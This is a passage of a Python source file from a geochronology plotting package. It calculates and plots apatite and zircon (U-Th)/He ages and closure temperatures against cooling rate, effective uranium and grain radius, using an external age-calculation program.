| 50.956589 | 272 | 0.703502 | 3,289 | 32,867 | 6.549711 | 0.062025 | 0.07302 | 0.037601 | 0.034816 | 0.869139 | 0.850989 | 0.820026 | 0.797605 | 0.782054 | 0.773744 | 0 | 0.085888 | 0.225971 | 32,867 | 644 | 273 | 51.035714 | 0.760888 | 0.012657 | 0 | 0.688805 | 0 | 0.003795 | 0.264834 | 0.197978 | 0 | 0 | 0.085627 | 0 | 0.055028 | 1 | 0.037951 | false | 0 | 0.018975 | 0 | 0.062619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
420871f98779a91192c69b649cb828ea1542b43e | 66,702 | py | Python | tcplotter/tcplotter.py | HUGG/gchron-plotters | 6f8115c62431030f59bbe6203b243f88d96527e0 | [
"MIT"
] | null | null | null | tcplotter/tcplotter.py | HUGG/gchron-plotters | 6f8115c62431030f59bbe6203b243f88d96527e0 | [
"MIT"
] | 5 | 2022-02-04T07:13:32.000Z | 2022-03-15T14:15:04.000Z | tcplotter/tcplotter.py | HUGG/gchron-plotters | 6f8115c62431030f59bbe6203b243f88d96527e0 | [
"MIT"
] | null | null | null | # Import libraries we need
import matplotlib.pyplot as plt
from matplotlib.ticker import ScalarFormatter
import numpy as np
import os
from pathlib import Path
from scipy.interpolate import interp1d
import shutil
import subprocess
# Define function for calculating effective uranium concentration
def calc_eu(uranium, thorium):
"""Calculates effective uranium concentration from U, Th inputs"""
return uranium + 0.238 * thorium
# Define function to find which version of the RDAAM_He/ketch_aft to use
def get_tc_exec(command):
"""Returns the location of the RDAAM_He or ketch_aft executable"""
if shutil.which(command) is not None:
tc_exec = command
elif Path("bin/" + command).is_file():
tc_exec = "bin/" + command
else:
raise FileNotFoundError(
f"Age calculation program {command} not found. See Troubleshooting in tcplotter docs online."
)
return tc_exec
# Define function for creating plot of cooling rates
def time_vs_temp(
cooling_rate_min=0.1,
cooling_rate_slow=1.0,
cooling_rate_avg=10.0,
cooling_rate_max=100.0,
temp_max=350.0,
time_max=50.0,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-whitegrid",
fill_between=True,
display_plot=True,
):
"""
Plots cooling rate lines for different input rates.
Parameters
----------
cooling_rate_min : float or int, default=0.1
Minimum cooling rate to plot in degrees C / Myr.
cooling_rate_slow : float or int, default=1.0
"Slow" cooling rate to plot in degrees C / Myr.
cooling_rate_avg : float or int, default=10.0
"Average" cooling rate to plot in degrees C / Myr.
cooling_rate_max : float or int, default=100.0
Maximum cooling rate to plot in degrees C / Myr.
temp_max : float or int, default=350.0
Maximum temperature for cooling history in degrees C.
time_max : float or int, default=50.0
Maximum value for time on x-axis of plot in millions of years ago (Ma).
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-whitegrid'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
fill_between : bool, default=True
Flag for whether to fill area between min, max cooling rates.
display_plot : bool, default=True
Flag for whether to display the plot.
Returns
-------
None
"""
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Find time and temperature bounds for plot
time_plot_min = min(time_max, temp_max / cooling_rate_min)
temp_plot_min = min(temp_max, cooling_rate_min * time_plot_min)
time_plot_slow = min(time_max, temp_max / cooling_rate_slow)
temp_plot_slow = min(temp_max, cooling_rate_slow * time_plot_slow)
time_plot_avg = min(time_max, temp_max / cooling_rate_avg)
temp_plot_avg = min(temp_max, cooling_rate_avg * time_plot_avg)
time_plot_max = min(time_max, temp_max / cooling_rate_max)
temp_plot_max = min(temp_max, cooling_rate_max * time_plot_max)
# Create arrays of points to plot
min_rate_x = np.array([time_plot_min, 0.0])
min_rate_y = np.array([temp_plot_min, 0.0])
slow_rate_x = np.array([time_plot_slow, 0.0])
slow_rate_y = np.array([temp_plot_slow, 0.0])
avg_rate_x = np.array([time_plot_avg, 0.0])
avg_rate_y = np.array([temp_plot_avg, 0.0])
max_rate_x = np.array([time_plot_max, 0.0])
max_rate_y = np.array([temp_plot_max, 0.0])
# Set plot style
plt.style.use(plot_style)
# Create figure
fig, ax = plt.subplots(1, 1, figsize=(6, 5))
if fill_between:
# Define fill ranges
min_rate_filly = np.array([temp_max, 0.0])
min_rate_fillx = np.array([temp_max / cooling_rate_min, 0.0])
max_rate_fillx = np.array([temp_max / cooling_rate_max, 0.0])
# Plot fill
ax.fill_betweenx(
min_rate_filly,
min_rate_fillx,
max_rate_fillx,
color="black",
alpha=0.15,
label="Range of model cooling rates",
)
# Plot lines
ax.plot(min_rate_x, min_rate_y, color="black")
ax.plot(slow_rate_x, slow_rate_y, color="black")
ax.plot(avg_rate_x, avg_rate_y, color="black")
ax.plot(max_rate_x, max_rate_y, color="black")
# Set axis tick label format
ax.xaxis.set_major_formatter(ScalarFormatter())
ax.yaxis.set_major_formatter(ScalarFormatter())
# Set plot x and y range
ax.set_xlim([0.0, time_max])
ax.set_ylim([0.0, temp_max])
# Add axis labels
ax.set_xlabel("Time (Ma)")
ax.set_ylabel("Temperature (°C)")
# Flip axis directions
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
# Use tight layout
plt.tight_layout()
# Save plot if requested
if save_plot:
# Set plot filename and save plot
plot_filename = "time_vs_temp_" + str(plot_dpi) + "dpi." + plot_file_format
plt.savefig(wd_orig + "/" + plot_filename, dpi=plot_dpi)
# Display plot if requested
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
# Define function for making contour plot of cooling ages and closure temperatures
def eu_vs_radius(
num_points=21,
cooling_hist_type=1,
temp_max=350.0,
cooling_rate=10.0,
time_hist=[0.0, 10.0, 25.0, 35.0],
temp_hist=[0.0, 75.0, 50.0, 350.0],
ap_u_min=1.0,
ap_u_max=150.0,
zr_u_min=1.0,
zr_u_max=4000.0,
ap_rad_min=40.0,
ap_rad_max=100.0,
zr_rad_min=40.0,
zr_rad_max=100.0,
ap_thorium=0.0,
zr_thorium=0.0,
plot_type=3,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-colorblind",
plot_colormap="plasma",
plot_alpha=1.0,
plot_contour_lines=12,
plot_contour_fills=256,
display_plot=True,
tt_plot=False,
verbose=False,
use_widget=False,
):
"""
Calculates thermochronometer ages and closure temperatures for different effective uranium concentrations and
equivalent spherical radii.
Parameters
----------
num_points : int, default=21
Number of points along x and y axes where ages/closure temperatures are
calculated.
NOTE: A value of num_points = 101 was used in the manuscript. It has been
reduced here to make the plotting faster. Set this to 101 to reproduce
the manuscript Figures 2 or 3.
cooling_hist_type : int, default=1
Cooling history type.
1 = constant cooling rate (specify rate as parameter rate)
2 = list of time-temperature points (fill in lists as parameters
time_hist, temp_hist)
temp_max : float, default=350.0
Max temperature for cooling history (in degrees C). Option only for cooling history type 1.
cooling_rate : float, default=10.0
Cooling rate in degrees C per Myr. Option only for cooling history type 1.
time_hist : list of floats or ints, default=[0.0, 10.0, 25.0, 35.0]
Time points defining cooling history in Ma (millions of years ago).
NOTE: Present-day point should be first in list.
Option only for cooling history type 2.
temp_hist : list of floats or ints, default=[0.0, 75.0, 50.0, 350.0]
Temperature points defining cooling history in degrees C.
NOTE: Present-day point should be first in list.
Option only for cooling history type 2.
ap_u_min : float, default=1.0
Minimum apatite uranium concentration in ppm.
ap_u_max : float, default=150.0
Maximum apatite uranium concentration in ppm.
zr_u_min : float, default=1.0
Minimum zircon uranium concentration in ppm.
zr_u_max : float, default=4000.0
Maximum zircon uranium concentration in ppm.
ap_rad_min : float, default=40.0
Minimum apatite equivalent spherical grain radius in micrometers.
ap_rad_max : float, default=100.0
Maximum apatite equivalent spherical grain radius in micrometers.
zr_rad_min : float, default=40.0
Minimum zircon equivalent spherical grain radius in micrometers.
zr_rad_max : float, default=100.0
Maximum zircon equivalent spherical grain radius in micrometers.
ap_thorium : float, default=0.0
Apatite thorium concentration in ppm.
zr_thorium : float, default=0.0
Zircon thorium concentration in ppm.
plot_type : int, default=3
eU versus radius plot type.
1 = apatite, 2 = zircon, 3 = both
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot(s) to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-colorblind'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
plot_colormap : str, default='plasma'
Colormap used for plotting. See https://matplotlib.org/stable/tutorials/colors/colormaps.html.
plot_alpha : float, default=1.0
Transparency used for plotting fill colors.
plot_contour_lines : int, default=12
Number of contour lines used for plotting.
plot_contour_fills : int, default=256
Number of contour fill colors from the selected colormap.
display_plot : bool, default=True
Flag for whether to display the plot.
tt_plot : bool, default=False
Flag for whether to create/display the time-temperature history plot.
verbose : bool, default=False
Enable/disable verbose output.
use_widget : bool, default=False
Enable/disable IPython progress bar widget. Disabled for command-line usage.
"""
# Check to see whether ipywidgets and IPython are available for widget use
# If not, disable widgets and display a warning
if use_widget:
try:
import ipywidgets as widgets
except ModuleNotFoundError:
print("Warning: ipywidgets module not found. Disabling graphical progress bar.")
use_widget = False
if use_widget:
try:
from IPython.display import display
except ModuleNotFoundError:
print(
"Warning: IPython.display module not found. Disabling graphical progress bar."
)
use_widget = False
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Define cooling history using constant cooling rate
if cooling_hist_type == 1:
# Define time and temperature histories
start_time = temp_max / cooling_rate
time_hist = [0.0, start_time]
temp_hist = [0.0, temp_max]
# Option 2: Define time-temperature history using list of tT points
elif cooling_hist_type == 2:
pass
# Raise error if an unsupported value is given for cooling_hist_type
else:
raise ValueError("Bad value for cooling_hist_type. Should be 1 or 2.")
# Create arrays of U concentrations
ap_u = np.linspace(ap_u_min, ap_u_max, num_points)
zr_u = np.linspace(zr_u_min, zr_u_max, num_points)
# Create grain radius arrays
ap_rad = np.linspace(ap_rad_min, ap_rad_max, num_points)
zr_rad = np.linspace(zr_rad_min, zr_rad_max, num_points)
# Calculate effective uranium
ap_eu = calc_eu(ap_u, ap_thorium)
zr_eu = calc_eu(zr_u, zr_thorium)
# Calculate total number of models
total_models = len(ap_u) * len(ap_rad)
# Screen output info
if plot_type == 1:
model_type = "apatite age/Tc (eU vs. radius)"
elif plot_type == 2:
model_type = "zircon age/Tc (eU vs. radius)"
elif plot_type == 3:
model_type = "apatite/zircon age/Tc (eU vs. radius)"
else:
raise ValueError("Bad value for plot_type. Should be 1, 2, or 3.")
# Define time-temperature history filename
tt_file = "simple_time_temp.txt"
# Get age calculation executable(s) to use
rdaam_command = get_tc_exec("RDAAM_He")
# Set plot style
plt.style.use(plot_style)
# Create figure
if plot_type < 3:
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
else:
fig, ax = plt.subplots(2, 2, figsize=(10, 10))
# Set plot loop variables
ap_x = ap_eu
ap_y = ap_rad
zr_x = zr_eu
zr_y = zr_rad
# Create lists for storing closure temperatures, ages
ahe_tc_list = []
ahe_age_list = []
ap_x_list = []
ap_y_list = []
zhe_tc_list = []
zhe_age_list = []
zr_x_list = []
zr_y_list = []
# Write cooling history points to file
with open(tt_file, "w") as f:
for i in range(len(time_hist)):
f.write(f"{time_hist[i]:.4f},{temp_hist[i]:.1f}\n")
# Echo total model run time and cooling rate
if verbose and cooling_hist_type == 1:
print(
f"Cooling from {temp_max:.1f}°C at a rate of {cooling_rate:.1f} °C/Myr will require {start_time:.2f} million years"
)
# Create visual progress bar, if enabled
if use_widget and not verbose:
s = widgets.IntProgress(
value=0,
min=0,
max=total_models,
description="Calculating:",
bar_style="", # 'success', 'info', 'warning', 'danger' or ''
style={"bar_color": "#ff6666"},
orientation="horizontal",
)
display(s)
# Loop over plotables
model_count = 0
for i in range(len(ap_x)):
for j in range(len(ap_y)):
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * model_count / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define parameters for this iteration
ap_uranium = ap_u[i]
zr_uranium = zr_u[i]
ap_radius = ap_rad[j]
zr_radius = zr_rad[j]
ap_x_list.append(ap_uranium)
zr_x_list.append(zr_uranium)
ap_y_list.append(ap_radius)
zr_y_list.append(zr_radius)
# Calculate (U-Th)/He ages
command = (
rdaam_command
+ " "
+ tt_file
+ " "
+ str(ap_radius)
+ " "
+ str(ap_uranium)
+ " "
+ str(ap_thorium)
+ " "
+ str(zr_radius)
+ " "
+ str(zr_uranium)
+ " "
+ str(zr_thorium)
)
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Find closure temperatures from cooling ages and thermal history
tc_interp = interp1d(time_hist, temp_hist)
ahe_tc = tc_interp(float(corr_ahe_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add closure temperatures, ages to lists
ahe_tc_list.append(ahe_tc)
ahe_age_list.append(float(corr_ahe_age))
zhe_tc_list.append(zhe_tc)
zhe_age_list.append(float(corr_zhe_age))
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C)"
)
# Clean up Tt file
os.remove(tt_file)
# Apatite eU versus radius
if plot_type == 1:
# Create age contour lines
ap_contours_age = ax[0].tricontour(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[0].clabel(ap_contours_age)
# Create age contour fill
ap_contourf_age = ax[0].tricontourf(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
ap_contours_tc = ax[1].tricontour(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="black",
)
# Add closure temperature contour labels
ax[1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc = ax[1].tricontourf(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc.collections:
c.set_edgecolor("face")
# Zircon eU versus radius
elif plot_type == 2:
# Create age contour lines
zr_contours_age = ax[0].tricontour(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[0].clabel(zr_contours_age)
# Create age contour fill
zr_contourf_age = ax[0].tricontourf(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
zr_contours_tc = ax[1].tricontour(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add closure temperature contour labels
ax[1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc = ax[1].tricontourf(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc.collections:
c.set_edgecolor("face")
# Apatite and zircon eU versus radius
else:
# Create age contour lines
ap_contours_age = ax[0][0].tricontour(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[0][0].clabel(ap_contours_age)
# Create age contour fill
ap_contourf_age = ax[0][0].tricontourf(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
ap_contours_tc = ax[0][1].tricontour(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add closure temperature contour labels
ax[0][1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc = ax[0][1].tricontourf(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc.collections:
c.set_edgecolor("face")
# Create age contour lines
zr_contours_age = ax[1][0].tricontour(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[1][0].clabel(zr_contours_age)
# Create age contour fill
zr_contourf_age = ax[1][0].tricontourf(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
zr_contours_tc = ax[1][1].tricontour(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add closure temperature contour labels
ax[1][1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc = ax[1][1].tricontourf(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc.collections:
c.set_edgecolor("face")
# Format plot
# Apatite eU versus radius
if plot_type == 1:
ax[0].set_title("Apatite (U-Th)/He age [Ma]")
ax[1].set_title("Apatite (U-Th)/He closure temperature [°C]")
# Zircon eU versus radius
elif plot_type == 2:
ax[0].set_title("Zircon (U-Th)/He age [Ma]")
ax[1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite and zircon eU versus radius
else:
ax[0][0].set_title("Apatite (U-Th)/He age [Ma]")
ax[0][1].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[1][0].set_title("Zircon (U-Th)/He age [Ma]")
ax[1][1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite or Zircon eU versus radius
if plot_type < 3:
ax[0].set_xlabel("Effective uranium (ppm)")
ax[1].set_xlabel("Effective uranium (ppm)")
ax[0].set_ylabel("Equivalent spherical radius (µm)")
ax[1].set_ylabel("Equivalent spherical radius (µm)")
# Apatite and zircon eU versus radius
else:
ax[0][0].set_xlabel("Effective uranium (ppm)")
ax[0][1].set_xlabel("Effective uranium (ppm)")
ax[0][0].set_ylabel("Equivalent spherical radius (µm)")
ax[0][1].set_ylabel("Equivalent spherical radius (µm)")
ax[1][0].set_xlabel("Effective uranium (ppm)")
ax[1][1].set_xlabel("Effective uranium (ppm)")
ax[1][0].set_ylabel("Equivalent spherical radius (µm)")
ax[1][1].set_ylabel("Equivalent spherical radius (µm)")
# Use tight layout for subplots
plt.tight_layout()
# Save plot if desired
if save_plot:
# Set file name prefix
plot_filename = "eu_vs_radius"
# Define plot filename based on type of plot and save plot
if plot_type == 1:
plot_savename = (
plot_filename + "_apatite_" + str(plot_dpi) + "dpi." + plot_file_format
)
elif plot_type == 2:
plot_savename = (
plot_filename + "_zircon_" + str(plot_dpi) + "dpi." + plot_file_format
)
else:
plot_savename = (
plot_filename
+ "_apatite_zircon_"
+ str(plot_dpi)
+ "dpi."
+ plot_file_format
)
plt.savefig(wd_orig + "/" + plot_savename, dpi=plot_dpi)
# Display plot if desired
if display_plot:
plt.show()
# Create tT history plot if requested
if tt_plot:
# Create figure 2
fig2, ax2 = plt.subplots(1, 1, figsize=(6, 5))
# Plot tT history
ax2.plot(time_hist, temp_hist, color="black")
# Set plot x and y range
ax2.set_xlim([0.0, max(time_hist)])
ax2.set_ylim([0.0, max(temp_hist)])
# Add axis labels
ax2.set_xlabel("Time (Ma)")
ax2.set_ylabel("Temperature (°C)")
# Add title
ax2.set_title("Time-temperature history")
# Flip axis directions
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
# Use tight layout
plt.tight_layout()
# Save plot if desired
if save_plot:
# Define plot filename and save plot
plot_savename2 = (
plot_filename
+ "_tT_history_"
+ str(plot_dpi)
+ "dpi."
+ plot_file_format
)
plt.savefig(wd_orig + "/" + plot_savename2, dpi=plot_dpi)
# Display plot if desired
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
# Define function for creating plot of cooling rates
def rate_vs_radius_eu(
num_points=21,
cooling_rate_min=0.1,
cooling_rate_max=100.0,
temp_max=350.0,
ap_u_min=1.0,
ap_u_max=150.0,
ap_u_ref=10.0,
zr_u_min=1.0,
zr_u_max=4000.0,
zr_u_ref=100.0,
ap_rad_min=40.0,
ap_rad_max=100.0,
ap_rad_ref=45.0,
zr_rad_min=40.0,
zr_rad_max=100.0,
zr_rad_ref=60.0,
ap_thorium=0.0,
zr_thorium=0.0,
plot_type=3,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-colorblind",
plot_colormap="plasma",
plot_alpha=1.0,
plot_contour_lines=12,
plot_contour_fills=256,
display_plot=True,
verbose=False,
use_widget=False,
):
"""
Calculates thermochronometer ages and closure temperatures for different cooling rates, effective uranium
concentrations, and equivalent spherical radii.
Parameters
----------
num_points : int, default=21
Number of points along x and y axes where ages/closure temperatures are
calculated.
NOTE: A value of num_points = 101 was used in the manuscript. It has been
reduced here to make the plotting faster. Set this to 101 to reproduce
the manuscript Figure 4.
cooling_rate_min : float, default=0.1
Minimum cooling rate in degrees C per Myr.
cooling_rate_max : float, default=100.0
Maximum cooling rate in degrees C per Myr.
temp_max : float, default=350.0
Max temperature for cooling history (in degrees C).
ap_u_min : float, default=1.0
Minimum apatite uranium concentration in ppm.
ap_u_max : float, default=150.0
Maximum apatite uranium concentration in ppm.
ap_u_ref : float, default=10.0
Apatite uranium concentration in ppm for rate versus radius plot.
zr_u_min : float, default=1.0
Minimum zircon uranium concentration in ppm.
zr_u_max : float, default=4000.0
Maximum zircon uranium concentration in ppm.
zr_u_ref : float, default=100.0
Zircon uranium concentration in ppm for rate versus radius plot.
ap_rad_min : float, default=40.0
Minimum apatite equivalent spherical grain radius in micrometers.
ap_rad_max : float, default=100.0
Maximum apatite equivalent spherical grain radius in micrometers.
ap_rad_ref : float, default=45.0
Apatite equivalent spherical grain radius in micrometers for rate versus eU plot.
zr_rad_min : float, default=40.0
Minimum zircon equivalent spherical grain radius in micrometers.
zr_rad_max : float, default=100.0
Maximum zircon equivalent spherical grain radius in micrometers.
zr_rad_ref : float, default=60.0
Zircon equivalent spherical grain radius in micrometers for rate versus eU plot.
ap_thorium : float, default=0.0
Apatite thorium concentration in ppm.
zr_thorium : float, default=0.0
Zircon thorium concentration in ppm.
plot_type : int, default=3
Cooling rate versus eU/radius.
1 = apatite, 2 = zircon, 3 = both
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-colorblind'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
plot_colormap : str, default='plasma'
Colormap used for plotting. See https://matplotlib.org/stable/tutorials/colors/colormaps.html.
plot_alpha : float, default=1.0
Transparency used for plotting fill colors.
plot_contour_lines : int, default=12
Number of contour lines used for plotting.
plot_contour_fills : int, default=256
Number of contour fill colors from the selected colormap.
display_plot : bool, default=True
Flag for whether to display the plot.
verbose : bool, default=False
Enable/disable verbose output.
use_widget : bool, default=False
Enable/disable IPython progress bar widget. Disabled for command-line usage.
Returns
-------
None
"""
# Check to see whether ipywidgets and IPython are available for widget use
# If not, disable widgets and display a warning
if use_widget:
try:
import ipywidgets as widgets
except ModuleNotFoundError:
print("Warning: ipywidgets module not found. Disabling graphical progress bar.")
use_widget = False
if use_widget:
try:
from IPython.display import display
except ModuleNotFoundError:
print(
"Warning: IPython.display module not found. Disabling graphical progress bar."
)
use_widget = False
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Create arrays of U concentrations
ap_u = np.linspace(ap_u_min, ap_u_max, num_points)
zr_u = np.linspace(zr_u_min, zr_u_max, num_points)
# Create grain radius arrays
ap_rad = np.linspace(ap_rad_min, ap_rad_max, num_points)
zr_rad = np.linspace(zr_rad_min, zr_rad_max, num_points)
# Create cooling rate array
rates = np.logspace(
start=np.log10(cooling_rate_min),
stop=np.log10(cooling_rate_max),
num=num_points,
)
# Calculate effective uranium
ap_eu = calc_eu(ap_u, ap_thorium)
zr_eu = calc_eu(zr_u, zr_thorium)
# Total number of models
total_models = len(ap_u) * len(rates) + len(ap_rad) * len(rates)
# Screen output info
if plot_type == 1:
model_type = "apatite age/Tc (cooling rate vs. radius/eU)"
elif plot_type == 2:
model_type = "zircon age/Tc (cooling rate vs. radius/eU)"
elif plot_type == 3:
model_type = "apatite/zircon age/Tc (cooling rate vs. radius/eU)"
else:
raise ValueError("Bad value for parameter plot_type. Must be 1, 2, or 3.")
# Define time-temperature history filename
tt_file = "simple_time_temp.txt"
# Get age calculation executable(s) to use
rdaam_command = get_tc_exec("RDAAM_He")
# Set plot style
plt.style.use(plot_style)
# Create figure
if plot_type < 3:
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
else:
fig, ax = plt.subplots(2, 2, figsize=(10, 10))
# Set plot loop variables
ap_x1 = rates
ap_y1 = ap_rad
zr_x1 = rates
zr_y1 = zr_rad
ap_x2 = rates
ap_y2 = ap_eu
zr_x2 = rates
zr_y2 = zr_eu
# Create lists for storing closure temperatures, ages
ahe_tc_list1 = []
ahe_tc_list2 = []
ap_x_list1 = []
ap_y_list1 = []
ap_x_list2 = []
ap_y_list2 = []
zhe_tc_list1 = []
zhe_tc_list2 = []
zr_x_list1 = []
zr_y_list1 = []
zr_x_list2 = []
zr_y_list2 = []
# Create visual progress bar, if enabled
if use_widget and not verbose:
s = widgets.IntProgress(
value=0,
min=0,
max=total_models,
description="Calculating:",
bar_style="", # 'success', 'info', 'warning', 'danger' or ''
style={"bar_color": "#ff6666"},
orientation="horizontal",
)
display(s)
# Loop over plotables - loop 1: rate versus radius
model_count = 0
for i in range(len(ap_x1)):
for j in range(len(ap_y1)):
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * model_count / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define parameters for this iteration
rate = rates[i]
ap_radius = ap_rad[j]
zr_radius = zr_rad[j]
ap_uranium = ap_u_ref
zr_uranium = zr_u_ref
ap_x_list1.append(rate)
zr_x_list1.append(rate)
ap_y_list1.append(ap_radius)
zr_y_list1.append(zr_radius)
# Write synthetic cooling history points to file
start_time = temp_max / rate
with open(tt_file, "w") as f:
f.write("0.0,0.0\n")
f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
# Screen output
if verbose:
print(
f"Cooling from {temp_max:.1f}°C at a rate of {rate:.1f} °C/Myr will require {start_time:.2f} million years"
)
# Calculate (U-Th)/He ages
command = (
rdaam_command
+ " "
+ tt_file
+ " "
+ str(ap_radius)
+ " "
+ str(ap_uranium)
+ " "
+ str(ap_thorium)
+ " "
+ str(zr_radius)
+ " "
+ str(zr_uranium)
+ " "
+ str(zr_thorium)
)
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Find closure temperatures from cooling ages and thermal history
tc_interp = interp1d([0.0, start_time], [0.0, temp_max])
ahe_tc = tc_interp(float(corr_ahe_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add closure temperatures to lists
ahe_tc_list1.append(ahe_tc)
zhe_tc_list1.append(zhe_tc)
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C)"
)
# Loop over plotables - loop 2: rate versus eU
for i in range(len(ap_x2)):
for j in range(len(ap_y2)):
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * (model_count) / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define parameters for this iteration
rate = rates[i]
ap_radius = ap_rad_ref
zr_radius = zr_rad_ref
ap_uranium = ap_u[j]
zr_uranium = zr_u[j]
ap_x_list2.append(rate)
zr_x_list2.append(rate)
ap_y_list2.append(ap_uranium)
zr_y_list2.append(zr_uranium)
# Write synthetic cooling history points to file
start_time = temp_max / rate
with open(tt_file, "w") as f:
f.write("0.0,0.0\n")
f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
# Screen output
